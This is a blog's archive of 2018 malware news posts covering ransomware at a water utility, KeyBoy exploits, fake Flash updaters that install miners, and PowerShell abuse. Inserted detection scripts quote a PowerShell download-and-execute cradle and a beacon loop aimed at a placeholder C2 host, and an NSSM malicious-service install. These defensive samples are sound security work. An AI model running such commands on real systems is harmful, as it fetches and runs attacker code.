Category Archives: Malware

A crippling ransomware attack hit a water utility in the aftermath of Hurricane Florence

A water utility in the US state of North Carolina suffered a severe ransomware attack in the aftermath of Hurricane Florence.

According to the Onslow Water and Sewer Authority (ONWASA), several internal systems were infected with the Emotet malware, but regular water service was not affected.

ONWASA said the infection will force it to rebuild several of its main databases from scratch; fortunately, no customer information was compromised.

“We are in the middle of another disaster following Hurricane Florence and tropical storm Michael,” CEO Jeff Hudson told employees in a video posted on Facebook.

“With a very sophisticated attack they penetrated our defenses, just as they penetrated the city of Atlanta and Mecklenburg county.”

ONWASA CEO Jeffrey Hudson confirmed that the attack began on October 4. IT staff initially believed they had locked the threat out, but on October 13 the malware began dropping the Ryuk ransomware onto the infected systems.

“An ONWASA IT staff member was working at 3am and saw the attack,” ONWASA said.

“IT staff took immediate action to protect system resources by disconnecting ONWASA from the internet, but the crypto-virus spread quickly along the network encrypting databases and files.”

The utility did not pay the ransom and opted to rebuild the infected systems instead.

“Ransom monies would be used to fund criminal, and perhaps terrorist activities in other countries,” ONWASA reasoned. “Furthermore, there is no expectation that payment of a ransom would forestall repeat attacks.”

The incident hit the utility’s operations at a critical moment, in the aftermath of Hurricane Florence.

ONWASA estimates it will take several weeks to rebuild all of the damaged systems. In the meantime, customers cannot pay their bills online, and the utility’s services face major delays.

Hurricane Florence hit Onslow County hard: schools are still closed and local authorities are still clearing debris from the storm. Restoring normal conditions has been estimated to cost $125m.

Pierluigi Paganini

(Security Affairs – Hurricane Florence, ransomware)

The post A crippling ransomware attack hit a water utility in the aftermath of Hurricane Florence appeared first on Security Affairs.

KeyBoy Attacker Group Uses Publicly Available Exploit Code to Deliver Malware

The KeyBoy attacker group is using publicly available exploit code for two Microsoft security flaws to infect vulnerable machines with malware.

Researchers at AlienVault recently observed a new campaign launched by the KeyBoy attacker group, which has been active since at least 2013. In this latest operation, the group sent a phishing email to India’s ambassador to Ethiopia from an email address at nic.in, India’s National Informatics Centre.

The email carried an attachment that executed a script containing the public exploit code for CVE-2017-0199, a Microsoft Office vulnerability that lets attackers execute arbitrary code via a crafted document. Other documents used an exploit generator for CVE-2017-8570, a related flaw that bypasses Microsoft’s patch for CVE-2017-0199.

Exploiting Known Vulnerabilities to Install TSSL and Titan Malware

Upon launching the exploit code, the script downloaded malware known as TSSL. Citizen Lab observed variants of TSSL that came with the FakeRun loader and the TClient backdoor, which allowed the attacker group to download additional threats and maintain a presence on an infected system.

AlienVault also detected KeyBoy’s ongoing distribution of Titan, Android malware that is capable of collecting an infected user’s data and performing instructions as a superuser, according to researchers at Lookout.

These KeyBoy attacks weren’t the first to involve exploit code for CVE-2017-0199 and CVE-2017-8570. FireEye observed attackers abusing CVE-2017-0199 with malicious Microsoft Office RTF documents in April 2017, and Trend Micro detected campaigns exploiting that same flaw via PowerPoint slideshows several months later. In April 2018, Zscaler identified a campaign that leveraged exploit code for CVE-2017-8570 to distribute LokiBot.
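A quick triage check for documents of this kind, as an added example that is not code from AlienVault, Zscaler or the article: it pulls the hex-encoded \objdata streams out of an RTF, decodes them and looks for the standard COM URL-moniker and composite-moniker CLSIDs, the OLE2Link class name and any UTF-16LE URL, and notes whether \objupdate is set (the control word that makes Word refresh the link when the document opens). The sample RTF is constructed, with a simplified object stream rather than a real OLE1 structure, so it exercises the scanner without being an exploit.

```python
"""Flag RTF documents whose embedded OLE objects reference the URL moniker
(the mechanism public CVE-2017-0199 exploit documents use to fetch a remote
payload) or the composite moniker (used by CVE-2017-8570 exploits).
Added example, not code from AlienVault or the article. The sample document
is constructed: its \\objdata blob is a simplified stand-in for a real OLE1
object, not a working exploit."""
import re
import uuid

# Standard COM moniker class identifiers; COM stores GUIDs in little-endian
# field order, which uuid.bytes_le reproduces.
URL_MONIKER_CLSID = uuid.UUID("79EAC9E0-BAF9-11CE-8C82-00AA004BA90B")
COMPOSITE_MONIKER_CLSID = uuid.UUID("00000309-0000-0000-C000-000000000046")

OBJDATA_RE = re.compile(rb"\\objdata\b(.*?)\}", re.DOTALL)
CONTROL_WORD_RE = re.compile(rb"\\[a-zA-Z]+-?\d* ?")
# A UTF-16LE http(s) URL inside the decoded object stream.
UTF16_URL_RE = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+")


def decode_objdata(body: bytes) -> bytes:
    """Convert the hex body of an \\objdata destination to raw bytes.
    Obfuscated samples interleave control words and whitespace, so strip
    those before decoding."""
    body = CONTROL_WORD_RE.sub(b"", body)
    hexchars = re.sub(rb"[^0-9a-fA-F]", b"", body)
    if len(hexchars) % 2:
        hexchars = hexchars[:-1]
    return bytes.fromhex(hexchars.decode("ascii"))


def scan_rtf(data: bytes) -> list:
    """Return one finding per embedded object."""
    findings = []
    # \objupdate forces the object to refresh when the document opens, which
    # is what lets these exploits fire without the user clicking anything.
    auto_update = b"\\objupdate" in data
    for index, match in enumerate(OBJDATA_RE.finditer(data)):
        blob = decode_objdata(match.group(1))
        findings.append({
            "object": index,
            "ole2link": b"OLE2Link" in blob or "OLE2Link".encode("utf-16-le") in blob,
            "url_moniker": URL_MONIKER_CLSID.bytes_le in blob,
            "composite_moniker": COMPOSITE_MONIKER_CLSID.bytes_le in blob,
            "objupdate": auto_update,
            "urls": [u.decode("utf-16-le") for u in UTF16_URL_RE.findall(blob)],
        })
    return findings


def is_suspicious(findings: list) -> bool:
    """Any moniker-based object or OLE2Link reference is worth a closer look."""
    return any(f["ole2link"] or f["url_moniker"] or f["composite_moniker"]
               for f in findings)


# Constructed sample: a linked OLE2Link object whose stream carries the URL
# moniker CLSID followed by a UTF-16LE URL pointing at a (fake) remote .hta.
_OBJECT_STREAM = (
    b"OLE2Link\x00"
    + URL_MONIKER_CLSID.bytes_le
    + "http://example.invalid/update.hta".encode("utf-16-le")
    + b"\x00\x00"
)
SAMPLE_RTF = (
    b"{\\rtf1\\ansi\n"
    b"{\\object\\objautlink\\objupdate{\\*\\objclass OLE2Link}\n"
    b"{\\*\\objdata " + _OBJECT_STREAM.hex().encode("ascii") + b"}}\n"
    b"}"
)

if __name__ == "__main__":
    for finding in scan_rtf(SAMPLE_RTF):
        print(finding)
    print("suspicious:", is_suspicious(scan_rtf(SAMPLE_RTF)))
```

The scanner is a first-pass filter, not a verdict: a hit says the document links to a remote object through a moniker, which legitimate documents rarely do, and the extracted URL is the next pivot for blocking and hunting.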

The Key to Stopping KeyBoy Attacks

Organizations can protect themselves against KeyBoy’s campaigns and similar operations by practicing intelligent vulnerability management. This approach requires organizations to create an effective vulnerability assessment process and use it to evaluate flaws based on their level of risk. Instead of patching everything as quickly as possible, organizations can use these vulnerability assessments to determine the order in which bugs should be patched.

Sources: AlienVault, Citizen Lab, Lookout, FireEye, Trend Micro, Zscaler

The post KeyBoy Attacker Group Uses Publicly Available Exploit Code to Deliver Malware appeared first on Security Intelligence.

Cryptomining attacks against Apple devices increase sharply

Check Point has published its latest Global Threat Index for September 2018, revealing a near-400% increase in cryptomining malware attacks against Apple iPhones. These attacks are using the Coinhive mining malware, which continues to occupy the top position in the Index that it has held since December 2017. Coinhive now impacts 19% of organizations worldwide. Check Point’s researchers also observed a significant increase in Coinhive attacks against PCs and devices using the Safari browser, which … More

The post Cryptomining attacks against Apple devices increase sharply appeared first on Help Net Security.

A week in security (October 8 – 14)

Last week, we warned you away from some dubious Doctor Who streams, explained how Endpoint Detection and Response may not be enough, and explored what happens during a confusing supply chain story. We also showed you how to keep up with security, explained the risks of fake browser updates, and explored the unpleasant world of workplace violence.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (October 8 – 14) appeared first on Malwarebytes Labs.

Malicious Platform Independent Trojan GPlayed Disguised as Google Play Store

By Waqas

Newly discovered Trojan malware, which has been dubbed as GPlayed by the IT security experts at Cisco Talos, disguises itself as Google Play Store to trick users into downloading it. After getting installed, it steals location information and bank details from the device. Additionally, it is capable of transferring code between desktop and mobile platforms. […]

This is a post from HackRead.com Read the original post: Malicious Platform Independent Trojan GPlayed Disguised as Google Play Store

Fake Adobe update really *does* update Flash (while also installing cryptominer)

Online criminals are planting cryptomining code on victims' Windows computers, using the camouflage of an update to Adobe Flash Player.

The post Fake Adobe update really *does* update Flash (while also installing cryptominer) appeared first on The State of Security.

Russia-linked BlackEnergy backed new cyber attacks on Ukraine’s state bodies

The Security Service of Ukraine (SBU) uncovered a new targeted attack launched by BlackEnergy APT on the IT systems of Ukrainian government entities.

The Security Service of Ukraine (SBU) has uncovered a new targeted attack on the information and telecommunication systems of Ukrainian government entities, which it attributes to the Russia-linked BlackEnergy APT group.

“The Security Service of Ukraine has received more evidence of the aggressive actions of Russian intelligence services against Ukraine in cyberspace using a controlled hacker group responsible for carrying out cyberattacks on Ukraine’s critical infrastructure facilities during 2015-2017, known as BlackEnergy and NotPetya,” reads the SBU’s press release.

BlackEnergy made headlines as the group responsible for the massive power outage in Ukraine in December 2015.

The BlackEnergy malware has been adapted to target SCADA systems; some variants include the KillDisk component, which wipes disks and renders systems inoperable.

According to the SBU, the attackers used new malware samples in this recent series of attacks. The new code acts as surveillance software, combining monitoring capabilities with remote administration features.

The SBU, together with experts from a well-known antivirus company, determined that the malware used in the attack is an updated version of the Industroyer backdoor.

The specialists involved in the investigation helped the Ukraine SBU to attribute the attack and implement mitigations to protect the IT infrastructure of government agencies.

As reported by ukrinform.net, the malware used in the recent attacks borrows code from Industroyer.

“They have a number of similar characteristics, in particular using similar code snippets, computing capabilities of infected systems, etc.,” states ukrinform.net.

Experts from the SBU also observed attackers using hacking tools that were used by the BlackEnergy hackers in previous attacks.

Pierluigi Paganini

(Security Affairs – Security Service of Ukraine, Russia-linked APT group)

The post Russia-linked BlackEnergy backed new cyber attacks on Ukraine’s state bodies appeared first on Security Affairs.

Fake Flash updaters deliver cryptominers AND update Flash

Cryptominers have dethroned ransomware as the top malware threat and cybercriminals are coming up with new ways to keep the mining activity secret from the victims. One of these includes tricking users into unknowingly downloading and running the mining software via a fake Adobe Flash updater. To keep up appearances, the fake updater uses pop-up notifications from the official Adobe installer. The campaign At the start of August, Palo Alto Networks researchers have noticed Windows … More

The post Fake Flash updaters deliver cryptominers AND update Flash appeared first on Help Net Security.

Fake Adobe updates installing cryptomining malware while updating Flash

By Waqas

IT security researchers at Palo Alto Networks have identified a fake Flash updater circulating on the web that fools computer users by sneakily installing the cryptocurrency mining bot XMRig. In the past few months, researchers have identified 113 fake updaters installing cryptomining malware on targeted devices. The updater has been actively attacking computers since August […]

This is a post from HackRead.com Read the original post: Fake Adobe updates installing cryptomining malware while updating Flash

Smarter Clicks: 5 Tips to Help Your Family Avoid Risky Cyber Search Traps

Searching the internet has become as much a part of daily life as pouring that first cup of coffee each morning. We rely on it, we expect it to deliver, and often, we do it without much thought. McAfee’s annual Most Dangerous Celebrity list gives us a chance to hit pause and think about smart search habits.

MDC: Ruby Rose

This year, it’s “Orange is the New Black” and “Batwoman” actress Ruby Rose who gets to don the digital crown of Most Dangerous Celebrity. That means cyber crooks and hackers are on to the public’s love of Ruby Rose and are exploiting those innocent searches for news, photos, and videos of this top actor. Other top dangerous searches are listed in the accompanying graphic. (Sitcom and television actors — Kristin Cavallari, Debra Messing, Kourtney Kardashian — surprisingly outranked musicians this year, so the click trend is weighted toward TV fans; if you are one, beware!)

This MDC reveal, coupled with October’s National Cyber Security Awareness Month (NCSAM) is a perfect time to sit down with your family and discuss safe clicking practices.

Smart Clicking

  1. Beware of third-party movie/music downloads. Some kids (and adults) search the internet for bootleg movies and music to download. Talk to your kids about this unsafe (and illegal) practice and its consequences. The safest thing to do? Advise your kids to wait for the official release instead of visiting a third-party website that could contain malware. This also applies to MP3 music searches: a search for the phrase “free MP3” returns some risky websites, so be aware of this cyber trap and search carefully. If a site looks suspect, keep moving. Teach kids that very few things that are legitimate are also free online.
  2. Update ASAP to stay safe! When you get a notification to update your phone, tablet, or PC, do it right away to make sure you have the latest, most secure version of your software, including security updates and bug fixes. Updating promptly is a critical way to block hackers and stop malware.
  3. Examine links. We aren’t about to stop searching, right? So the solution is to search smarter. Like it or not, we’ve got to become security pros to some degree. Teach your family members to slow down and examine sites in order to spot sketchy third-party links. Look for flaws. Refuse to click on that third-party link that could get you in trouble — it’s simply not worth it!
  4. Protect devices. We are going to search; not much can stop that. So, search with an extra layer of security protection such as McAfee Total Protection. This comprehensive security solution keeps your family devices protected against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor which can stop your kids from going to malicious websites.
  5. Think about parental control software. Kids are big fans of whomever and whatever is on trend and love to search, scroll, and consume information on celebrities. Helping kids balance online time with daily responsibilities and relationships can take up a big chunk of our time as parents. Consider setting limits on screen time and use software that filters inappropriate content and protects against malicious sites.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures)

The post Smarter Clicks: 5 Tips to Help Your Family Avoid Risky Cyber Search Traps appeared first on McAfee Blogs.

Security Affairs: Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate update

Security experts from Palo Alto Networks warn of a fake Adobe Flash update that hides a cryptocurrency miner while genuinely updating the software.

A fake Adobe Flash update has been used as a vector for a malicious cryptocurrency miner; the novelty of this campaign lies in the tricks the attackers use to drop the malware stealthily.

The fake Adobe Flash update has been active in a campaign since the summer. It borrows pop-up notifications from the official Adobe installer and really does update the victim’s Flash Player, but it also downloads an XMRig cryptocurrency miner onto Windows systems.

“However, a recent type of fake Flash update has implemented additional deception. As early as August 2018, some samples impersonating Flash updates have borrowed pop-up notifications from the official Adobe installer.” reads the analysis published by Palo Alto Networks.

“These fake Flash updates install unwanted programs like an XMRig cryptocurrency miner, but this malware can also update a victim’s Flash Player to the latest version.”

The fake Adobe Flash updates use file names starting with AdobeFlashPlayer that are hosted on cloud-based web servers that don’t belong to Adobe.

The downloads always include the string “flashplayer_down.php?clickid=” in the URL.

At the time of the report, it was still unclear how the attackers were spreading the URLs that deliver the fake Adobe Flash update.

The domain is associated with other updaters or installers pushing cryptocurrency miners and other unwanted software

Network traffic analysis revealed that infected Windows hosts connect to osdsoft[.]com via HTTP POST requests. This domain was already associated with updaters or installers pushing cryptocurrency miners.

“This domain is associated with updaters or installers pushing cryptocurrency miners and other unwanted software. One such example from December 2017 named free-mod-menu-download-ps3.exe also shows osdsoft[.]com followed by XMRig traffic on TCP port 14444 like the example used in this blog.” continues the report.

“However, other malware samples reveal osdsoft[.]com is associated with other unwanted programs usually classified as malware.”
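The three network indicators quoted above can be correlated per host. The following is an added example, not Palo Alto Networks’ code: it reads a constructed proxy/flow log format (timestamp, source IP, method, destination host:port, URL), written undefanged so that osdsoft.com matches, and reports hosts where the fake-updater download URL was seen, or where at least two of the indicators (POST to osdsoft.com, TCP traffic to port 14444) coincide. The log lines are constructed for the demo.

```python
"""Correlate the network indicators Palo Alto Networks published for the fake
Flash updater: a download URL containing "flashplayer_down.php?clickid=", an
HTTP POST to osdsoft[.]com, and XMRig traffic on TCP port 14444. Added
example, not Palo Alto Networks' code; the log format and the log lines
below are constructed for the demo."""
import re
from collections import defaultdict
from typing import Dict, Optional, Set, Tuple

FAKE_FLASH_URL_MARKER = "flashplayer_down.php?clickid="
INSTALLER_CALLBACK_DOMAIN = "osdsoft.com"   # defanged as osdsoft[.]com in the report
XMRIG_STRATUM_PORT = 14444

# Constructed line format: "<timestamp> <src_ip> <METHOD|TCP> <dst_host>:<dst_port> <url or ->"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<host>[^:\s]+):(?P<port>\d+) (?P<url>\S+)$"
)


def classify(line: str) -> Optional[Tuple[str, str]]:
    """Map one log line to (source_ip, indicator_name), or None if it matches nothing."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    src, method, host = m["src"], m["method"].upper(), m["host"].lower()
    port, url = int(m["port"]), m["url"]
    if FAKE_FLASH_URL_MARKER in url:
        return src, "fake_flash_download"
    if method == "POST" and host == INSTALLER_CALLBACK_DOMAIN:
        return src, "osdsoft_post"
    if method == "TCP" and port == XMRIG_STRATUM_PORT:
        return src, "xmrig_port"
    return None


def find_infected_hosts(log: str) -> Dict[str, Set[str]]:
    """Group indicators by source host. Port 14444 on its own is a weak
    signal (it is not reserved for XMRig), so a host is reported only when
    the download URL was seen or at least two independent indicators hit."""
    hits: Dict[str, Set[str]] = defaultdict(set)
    for line in log.splitlines():
        result = classify(line)
        if result:
            src, indicator = result
            hits[src].add(indicator)
    return {src: inds for src, inds in hits.items()
            if "fake_flash_download" in inds or len(inds) >= 2}


SAMPLE_LOG = """\
2018-10-05T09:12:01Z 10.0.0.5 GET flash-mirror.invalid:80 http://flash-mirror.invalid/flashplayer_down.php?clickid=abc123
2018-10-05T09:12:05Z 10.0.0.5 GET www.example.com:443 https://www.example.com/get/flashplayer/
2018-10-05T09:12:40Z 10.0.0.5 POST osdsoft.com:80 http://osdsoft.com/
2018-10-05T09:13:10Z 10.0.0.5 TCP 198.51.100.7:14444 -
2018-10-05T09:20:00Z 10.0.0.9 GET www.example.com:443 https://www.example.com/
2018-10-05T09:21:00Z 10.0.0.12 TCP 203.0.113.4:14444 -
"""

if __name__ == "__main__":
    for host, indicators in find_infected_hosts(SAMPLE_LOG).items():
        print(host, sorted(indicators))
```

Host 10.0.0.12 only touches port 14444 and is deliberately not reported; a single high-numbered port is not evidence on its own, and the report’s own observation is that the miner traffic follows the osdsoft[.]com POST.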

Palo Alto Networks experts highlighted that potential victims still receive the usual Windows warning messages about running downloaded files.

“This campaign uses legitimate activity to hide distribution of cryptocurrency miners and other unwanted programs,” concludes the analysis.

“Organizations with decent web filtering and educated users have a much lower risk of infection by these fake updates.”

Pierluigi Paganini

(Security Affairs – fake Adobe Flash update, hacking)

The post Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate update appeared first on Security Affairs.



Fake Flash updates upgrade software, but install crypto-mining malware

Cybersecurity firm Palo Alto Networks says it has discovered a fake Flash updater that has been duping conscientious computer users since August. The fake updater installs files that sneak in a cryptocurrency mining bot called XMRig, which mines Monero.

But here's the catch, while the fake updater is installing the XMRig malware, it's also updating the user's Flash.

Via: The Next Web

Source: Palo Alto Networks

iTranslator Malware Installs Two Drivers to Perform a MitM Attack

Researchers uncovered a malware sample called iTranslator that installs two drivers onto an infected machine to perform a man-in-the-middle (MitM) attack.

According to FortiGuard Labs, the malware sample, called itranslator_02.exe, is signed by a digital certificate that expired back in 2015.

The sample starts by creating a folder called “itranslator” in the ProgramData folder and extracting a file named wintrans.exe into it. That file first installs iTranslatorSvc, a driver that lets the malware load at system startup, then installs a second driver called iNetfilterSvc before downloading iTranslator.dll.

This dynamic link library (DLL) is the main malware module. It installs an SSL certificate into web browsers’ trusted root certificate stores without the victim’s permission, communicates with the two drivers iNetfilterSvc and iTranslatorSvc, and monitors the internet traffic of the victim’s web browsers. Together these functions let iTranslator perform a MitM attack on the compromised system, which lets the attackers steal sensitive information.

What Are the Elements of a MitM Attack?

As noted by Incapsula, a successful MitM attack consists of two elements: the interception of user traffic before it reaches its destination and the decryption of SSL traffic without alerting the user. Bad actors have several methods, such as IP spoofing and SSL hijacking, that allow them to fulfill both of these stages.

Online criminals are also embedding these tactics into different kinds of threats. Kaspersky Lab researchers noted that they discovered MitM capabilities in malicious Google Chrome extensions. According to Cisco Talos, meanwhile, the advanced Internet of Things (IoT) botnet malware VPNFilter also had a module for conducting MitM attacks.

How to Protect Against Malware Like iTranslator

For computers infected with iTranslator, FortiGuard Labs advised security professionals to delete the files and folders created by the malware. Because the malware also plants a root certificate, that certificate should be removed from the affected trust stores as well; otherwise TLS traffic intercepted with it would still pass the browser’s checks. In general, organizations can defend themselves against MitM attacks by implementing a layered defense strategy that combines traditional, file-based security with machine learning, threat detection sandboxing and next-generation endpoint protection.

Sources: FortiGuard Labs, Incapsula, Securelist, Cisco Talos

The post iTranslator Malware Installs Two Drivers to Perform a MitM Attack appeared first on Security Intelligence.

An Increase in PowerShell Attacks: Observations From IBM X-Force IRIS

Do you remember the era before GPS navigation devices? When getting somewhere unfamiliar involved receiving and remembering verbal directions, or — in the higher-tech ’90s — printing out a list of directions and a map to take on the trip? The ease and convenience of GPS devices has made these older methods all but obsolete. For many, there is no going back.

Such is the pathway of PowerShell, a Microsoft framework that is both a scripting language and a command line executor, useful for simplifying network administration and automating mundane tasks such as pushing updates to multiple devices. PowerShell first appeared in 2006 and has been a standard feature of the Windows operating system (OS) since Windows 7. Moreover, PowerShell was open-sourced under the Massachusetts Institute of Technology (MIT) license in 2016, as the cross-platform PowerShell 6.0, in an effort to encourage adoption and increase usage.

PowerShell is a versatile tool that can execute code from memory and provides direct access to the operating system’s internals: unbounded access to Windows application programming interfaces (APIs), full access to Windows Management Instrumentation (WMI) and access to the .NET Framework.

Despite its multiple benefits, PowerShell — like GPS systems — can be used by threat actors. IBM X-Force Incident Response and Intelligence Services (IRIS) identified an upward trend in malicious PowerShell use — most likely due to the open-source nature of the tool, and because malicious actors have realized they can use the tool to inject malware directly into memory, enhance obfuscation and evade antivirus detection software. Our observations provide additional insight to this evolving trend, and highlight unique aspects of PowerShell use by threat actors, such as PowerShell scripts installed as services.

PowerShell Attacks Are Trending Upward

Multiple security analysts have noted a significant increase in malicious PowerShell use after PowerShell became open source in 2016. A McAfee Labs report found that PowerShell malware increased by 432 percent between 2016 and 2017, and Symantec noted a 661 percent increase in the number of computers where PowerShell activity was blocked from mid-2017 to mid-2018.

IBM X-Force data similarly revealed that PowerShell attacks have been growing over the past 12 months. Furthermore, data from our Managed Security Services (MSS) identified a distinct increase in the use of malicious PowerShell in April, August and September 2018 (Figure 1).

Figure 1: PowerShell attacks using obfuscation and suspicious downloaders, March-September 2018

While our data indicated that obfuscated attacks trailed off in May and June 2018, they reappeared in late July 2018. In mid-September, we began to see a new attack type appear in our data: suspicious PowerShell downloader activity indicating that a remote attacker was attempting to use PowerShell to download malicious content and automatically trigger execution of the payload. This could allow malicious code to run and infect the target system.

More Power in the Shell?

The appeal of the PowerShell framework to an attacker is clear: execution directly from memory means that attacks can remain fileless and are thus stealthier than other types of attacks. PowerShell also provides remote access capabilities and can bypass application whitelisting. Moreover, threat actors can use PowerShell encoding options to enhance the obfuscation of malicious code, lending more stealth to illicit operations.

Yet just as shutting down the entire GPS satellite network would have more negative repercussions for legitimate users than would be worthwhile — and criminals would probably find a workaround anyway — the elimination of PowerShell would provide little resolution to the underlying problem of malicious cyber actors. Instead, security practitioners would do well to stay updated on how bad actors can use PowerShell and familiarize themselves with the tools available to detect and eradicate malevolent activities.

To that end, let’s take a look at some of the trends in malicious PowerShell use observed by X-Force IRIS — leading with the most unique — and explore some tips to help defenders detect and mitigate PowerShell attacks.

Trend 1: PowerShell Scripts Installed as Services

One of the more unique tactics we have observed in recent attacks on organizational networks is threat actors installing PowerShell scripts as services. Windows services are programs that run in the background and do not require frequent user interaction. As such, malicious actors can leverage these types of programs to install and run other programs while evading detection under the guise of a legitimate part of the operating system.

In most of the instances in which X-Force IRIS observed PowerShell scripts installed as services, the script contained a base64-encoded string. The string decodes to a Gzip-compressed PowerShell script, which is then launched. In the example below, the PowerShell script is run as a service and requires Non-Sucking Service Manager (NSSM) to operate. That component was initially installed as part of the malware payload. Once installed, the PowerShell script calls NSSM and launches the malicious service.

Start-Process -FilePath .\nssm.exe -ArgumentList 'install MaliciousService "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-command "& { . C:\Scripts\Monitor.ps1; Start-Monitoring }"" ' -NoNewWindow -Wait

Installing PowerShell scripts as services is not a common theme in security blogs and reports, suggesting this is a new or unique trend.
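Unpicking that layering is straightforward once a service’s command line is in hand. The following is an added example, not IBM’s code: it triages a set of service command lines for powershell.exe (optionally wrapped by nssm.exe), finds long Base64 runs, decodes them, inflates them if they start with the gzip magic bytes, and returns the inner script, which also covers the plain -EncodedCommand downloader form described above. The service entries are constructed stand-ins, assumed to be the Application and AppParameters values NSSM stores under the service’s registry key, or Win32_Service PathName for ordinary services; nothing in them is executed.

```python
"""Triage Windows service command lines for the pattern X-Force IRIS describes:
powershell.exe launched (often via nssm.exe) with a Base64 string that decodes
to a Gzip-compressed script, plus the plain -EncodedCommand form used by
downloaders. Added example, not IBM's code. The service entries are
constructed; each command line is a stand-in that is never executed here."""
import base64
import gzip
import re
from typing import Dict, List, Optional

POWERSHELL_RE = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.IGNORECASE)
NSSM_RE = re.compile(r"\bnssm(?:\.exe)?\b", re.IGNORECASE)
# Candidate payloads are long Base64 runs; the length floor keeps ordinary words out.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def _to_text(raw: bytes) -> Optional[str]:
    """-EncodedCommand payloads are UTF-16LE; gzipped scripts are usually UTF-8."""
    encoding = "utf-16-le" if b"\x00" in raw[:64] else "utf-8"
    try:
        text = raw.decode(encoding)
    except UnicodeDecodeError:
        return None
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def decode_layers(token: str) -> Optional[str]:
    """Base64 -> optional gzip -> text. Returns the inner script or None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    if raw[:2] == b"\x1f\x8b":  # gzip magic
        try:
            raw = gzip.decompress(raw)
        except (OSError, EOFError):
            return None
    return _to_text(raw)


def triage_service(name: str, command_line: str) -> Dict[str, object]:
    scripts: List[str] = []
    for token in B64_RE.findall(command_line):
        script = decode_layers(token)
        if script:
            scripts.append(script)
    runs_powershell = bool(POWERSHELL_RE.search(command_line))
    wrapped_by_nssm = bool(NSSM_RE.search(command_line))
    return {
        "service": name,
        "runs_powershell": runs_powershell,
        "wrapped_by_nssm": wrapped_by_nssm,
        "decoded_scripts": scripts,
        # PowerShell as a service is unusual on its own; wrapped by NSSM or
        # carrying an encoded payload it matches the observed tradecraft.
        "suspicious": runs_powershell and (wrapped_by_nssm or bool(scripts)),
    }


def triage_services(services: Dict[str, str]) -> Dict[str, Dict[str, object]]:
    return {name: triage_service(name, cmd) for name, cmd in services.items()}


# Constructed stand-ins for the decoded payloads.
INNER_SCRIPT = "while ($true) { Start-Sleep 60; Invoke-WebRequest http://c2.invalid/beacon }"
DOWNLOADER_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/stage2')"
_GZ_B64 = base64.b64encode(gzip.compress(INNER_SCRIPT.encode("utf-8"))).decode("ascii")
_ENC_B64 = base64.b64encode(DOWNLOADER_CMD.encode("utf-16-le")).decode("ascii")

SAMPLE_SERVICES = {
    # NSSM wrapping powershell.exe, which inflates and runs the gzipped script.
    "MaliciousService": (
        'C:\\Tools\\nssm.exe "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
        "-NoProfile -Command \"$b=[Convert]::FromBase64String('" + _GZ_B64 + "');"
        "$s=New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,$b)),"
        "[IO.Compression.CompressionMode]::Decompress);"
        "IEX (New-Object IO.StreamReader($s)).ReadToEnd()\""
    ),
    # The downloader form: a hidden window and an -EncodedCommand payload.
    "Updater": "powershell.exe -NoP -W Hidden -EncodedCommand " + _ENC_B64,
    # Benign references for comparison.
    "Spooler": "C:\\Windows\\System32\\spoolsv.exe",
    "MyAgent": "powershell.exe -NoProfile -File C:\\ProgramData\\Agent\\agent.ps1",
}

if __name__ == "__main__":
    for name, report in triage_services(SAMPLE_SERVICES).items():
        print(name, report["suspicious"], report["decoded_scripts"])
```

The MyAgent entry is left unflagged because the payload lives in a script file rather than in the command line; in practice that file needs the same review, and the decoded scripts from the flagged services are where the real content (download URLs, persistence logic) shows up.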

Trend 2: Propagation Through File Macros

Before exploiting PowerShell on a device, threat actors must first gain access to the device of interest. One common method that X-Force IRIS has observed is the use of phishing emails with productivity file attachments that contain malicious macros. Once activated, the malicious macros launch PowerShell, which then executes commands or scripts in the background and ultimately fetches and installs malicious code or malware. In some other cases, we have observed the use of internet query (IQY) file attachments in phishing attacks to initiate PowerShell and run malicious scripts.

According to periodic reports from anti-phishing organizations, phishing attacks continue to have a high rate of success. Subtle social engineering techniques, combined with well-researched messages and attachments that closely mimic those coming from legitimate organizations, continue to prove effective in deceiving even the most security-savvy recipients. Unsurprisingly, phishing emails remain the infection vector of choice for many skilled and unskilled attackers seeking to use PowerShell for malicious purposes.

Microsoft Word and Excel macros are likewise popular choices for malicious PowerShell use since they are routinely accepted as email attachments by many organizations. Activating code via macros on these file types can be stealthy, and this provides an avenue for dropping scripts that can evade various detection mechanisms.

X-Force IRIS regularly observes attackers using productivity file attachments purporting to be billing invoices, delivery notices or resumes to lure victims into opening them and enabling macros, which can end up infecting hosts and granting an attacker a foothold in the organization.

Trend 3: Injecting Malicious Code Into Memory

Threat actors often inject malware directly into memory using PowerShell, a tactic that IRIS has observed on multiple occasions. Using PowerShell as an injection method for malicious code or malware can eliminate intermediate steps and increase the malware’s stealth and agility.

Injecting malware directly into memory is one method that PowerShell users employ to bypass antivirus systems. As most antivirus software systems search for bad files written to disk, malicious actors may be able to evade malware scans by injecting directly into a computer’s random-access memory (RAM).

The destination process for the PowerShell injection varies depending on the attacker’s intention and skill. In many cases, attackers use PowerShell to inject malware into active, legitimate Windows processes, such as explorer.exe. To facilitate this process, threat actors occasionally drop their PowerShell scripts into temporary folders on the system. Once deployed, the malware injected directly into memory will have capabilities similar, if not identical, to malware written to disk: keylogging, data exfiltration and credential capture are just some of the operations that can then be commanded by a remote attacker.

In one example, the malware was capable of checking the environment before deployment to ensure it was not being run in a sandbox. It also scanned the network configuration for specific targets of interest, seeking out strings such as point-of-sale machines, healthcare-related words and access to financial websites, to name a few.

Trend 4: Base64-Encoded Scripts and Nested Obfuscation

